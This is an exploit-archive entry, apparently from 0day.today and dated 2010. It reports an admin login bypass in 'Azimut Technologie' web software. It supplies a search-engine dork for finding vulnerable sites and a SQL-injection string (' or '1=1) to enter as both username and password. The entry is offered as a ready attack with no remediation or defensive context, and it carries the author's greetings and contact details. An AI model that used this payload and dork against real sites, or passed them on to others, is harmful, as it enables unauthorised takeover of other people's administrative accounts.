id: 12350
date: 05/22/2010
title: Azimut Technologie Admin Login Bypass vulnerability
author: ra3ch
cves: 

===================================================
Azimut Technologie Admin Login Bypass vulnerability
===================================================


************************************************************
** Prodcut: Azimut Technologie
** Home : N/A
** Vunlerability : Admin Bypass
** Risk : High
** Dork : "© 2009 Azimut Technologie"
************************************************************
** Discovred by: Ra3cH
** From : Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N ? & n2n &
***********************************************************
** Exploit:
** http://[PATH]/Use your intelligence
**
** user : ' or '1=1
** password : ' or '1=1
**
************************************************************
**
** user : ' or '1=1
** password : ' or '1=1
**
************************************************************ 



#  0day.today [2023-03-22]  #